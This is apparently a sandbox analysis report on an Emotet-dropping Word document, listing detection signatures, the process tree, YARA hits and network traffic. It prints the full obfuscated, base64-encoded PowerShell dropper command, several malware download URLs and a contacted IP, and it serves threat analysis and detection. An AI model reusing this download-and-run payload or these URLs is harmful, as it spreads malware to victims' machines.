Loading ...

Play interactive tourEdit tour

Analysis Report pack 2254794.doc

Overview

General Information

Sample Name:pack 2254794.doc
Analysis ID:336496
MD5:1e1ec8dd9b25146cc2104be64d6f9bf0
SHA1:d7253cfd0015dbb38c6e2bb602216468d83e4b4a
SHA256:048e5df452e4ba303faa434c138839e4fdf6e8e5004ced58aa30569573eda17e

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2288 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2616 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2548 cmdline: POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2848 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 960 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x1f10:$s1: POwersheLL
    00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          Click to see the 7 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.rundll32.exe.1e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            11.2.rundll32.exe.210000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              9.2.rundll32.exe.170000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                7.2.rundll32.exe.190000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  10.2.rundll32.exe.1c0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 10 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: https://fnjbq.com/wp-includes/rlR/Avira URL Cloud: Label: malware
                    Source: http://wap.zhonglisc.com/wp-includes/QryCB/Avira URL Cloud: Label: malware
                    Source: http://petafilm.com/wp-admin/4m/Avira URL Cloud: Label: malware
                    Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: petafilm.comVirustotal: Detection: 6%Perma Link
                    Source: http://petafilm.comVirustotal: Detection: 6%Perma Link
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: pack 2254794.docVirustotal: Detection: 30%Perma Link
                    Source: pack 2254794.docReversingLabs: Detection: 32%
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002375AE CryptDecodeObjectEx,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023109C FindFirstFileW,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: global trafficDNS query: name: petafilm.com
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80

                    Networking:

                    barindex
                    Potential dropper URLs found in powershell memoryShow sources
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in memory: http://petafilm.com/wp-admin/4m/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in memory: http://givingthanksdaily.com/qlE/VeF/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in memory: https://fnjbq.com/wp-includes/rlR/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in memory: https://somanap.com/wp-admin/P/
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/octet-streamExpires: Wed, 06 Jan 2021 07:49:24 GMTLast-Modified: Wed, 06 Jan 2021 07:49:24 GMTServer: Microsoft-IIS/10.0Set-Cookie: 5ff56b8489beb=1609919364; expires=Wed, 06-Jan-2021 07:50:24 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="QieaYu0XHj8.dll"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 06 Jan 2021 07:49:23 GMTContent-Length: 192000Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 